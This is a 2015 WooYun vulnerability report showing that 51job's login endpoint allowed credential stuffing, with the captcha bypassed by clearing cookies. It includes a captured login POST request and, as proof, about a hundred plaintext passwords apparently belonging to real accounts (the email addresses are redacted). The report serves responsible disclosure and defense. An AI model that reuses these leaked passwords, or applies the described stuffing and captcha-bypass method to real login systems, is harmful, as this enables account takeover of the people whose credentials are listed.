当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110998

漏洞标题:前程无忧51job某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商:前程无忧(51job)

漏洞作者: 路人甲

提交时间:2015-04-29 10:43

修复时间:2015-06-17 15:26

公开时间:2015-06-17 15:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-05-03: 厂商已经确认,细节仅向厂商公开
2015-05-13: 细节向核心白帽子及相关领域专家公开
2015-05-23: 细节向普通白帽子公开
2015-06-02: 细节向实习白帽子公开
2015-06-17: 细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。不管你的网站密码保护的多好,但是面对已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。

详细说明:

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号。 仅对单个账号错误出现验证码。删除cookie,可以撞库。 登录接口抓包如下:

POST /47107315565447156545/my/My_Pmc.php HTTP/1.1
Host: mylogin.51job.com
Connection: close
Content-Length: 77
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://my.51job.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://my.51job.com/my/My_SignIn.php?url=&errmsg=UserNameOrPwdError
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
username=xw@mail%2ezhongxing%2ecom&userpwd=david&login_verify=&url=&x=52&y=26


漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.
成功率高的吓人。看来果然有很多用户。。。。

[email protected]	5128752
[email protected]	inform
[email protected]	sysop123
[email protected]	5418866
[email protected]	loginlsd
[email protected]	730413
[email protected]	771111
[email protected]	hyxb-420
[email protected]	agnes212
[email protected]	infoweb
[email protected]	sineysoft
[email protected]	caoyijie
[email protected]	1414gyxf
[email protected]	wangmickey
[email protected]	comtech
[email protected]	44476090
[email protected]	love
[email protected]	900267
[email protected]	101112
[email protected]	888999
[email protected]	838980
[email protected]	19760502
[email protected]	zrbzrb
[email protected]	19770412
[email protected]	twsystem
[email protected]	zhouyuan
[email protected]	explorer
[email protected]	bugadmin
[email protected]	720705
[email protected]	987773
[email protected]	83624585
[email protected]	19760108
[email protected]	19800229
[email protected]	wangjian
[email protected]	780122
[email protected]	452570
[email protected]	priverhe
[email protected]	073011
[email protected]	rose
[email protected]	yulingkong!!
[email protected]	gao1218
[email protected]	xinmen
[email protected]	970820
[email protected]	95421139
[email protected]	zq1972
[email protected]	seastar
[email protected]	537226
[email protected]	kingdom
[email protected]	1125007
[email protected]	741112
[email protected]	sapling
[email protected]	wapeka
[email protected]	197936
[email protected]	343161
[email protected]	001128
[email protected]	zch1725
[email protected]	666666
[email protected]	zhczhc
[email protected]	alixon1973
[email protected]	770503
[email protected]	abc123
[email protected]	yhch
[email protected]	751211
[email protected]	077225
[email protected]	322104
[email protected]	mimibar
[email protected]	101112
[email protected]	a7v5b4
[email protected]	9394167
[email protected]	771220
[email protected]	ghp4lily
[email protected]	bencompu
[email protected]	annie
[email protected]	19733288
[email protected]	mt1hy9bh
[email protected]	953232
[email protected]	117111
[email protected]	fjz78509
[email protected]	1975
[email protected]	lcp978331
[email protected]	yp781012
[email protected]	650005
[email protected]	afxapi
[email protected]	softgirl718
[email protected]	congjun
[email protected]	admin123
[email protected]	shen
[email protected]	00000
[email protected]	771209
[email protected]	123456
[email protected]	liu0615
[email protected]	config
[email protected]	anthony
[email protected]	730313
[email protected]	dvlpment
[email protected]	chf1973
[email protected]	26418725
[email protected]	277000
[email protected]	fuckyou
[email protected]	david
[email protected]	19760527
[email protected]	smart1010
[email protected]	flycat
[email protected]	syl416


屏幕快照 2015-04-29 上午9.42.37.png

修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-03 15:25

厂商回复:

谢谢反馈

最新状态:

暂无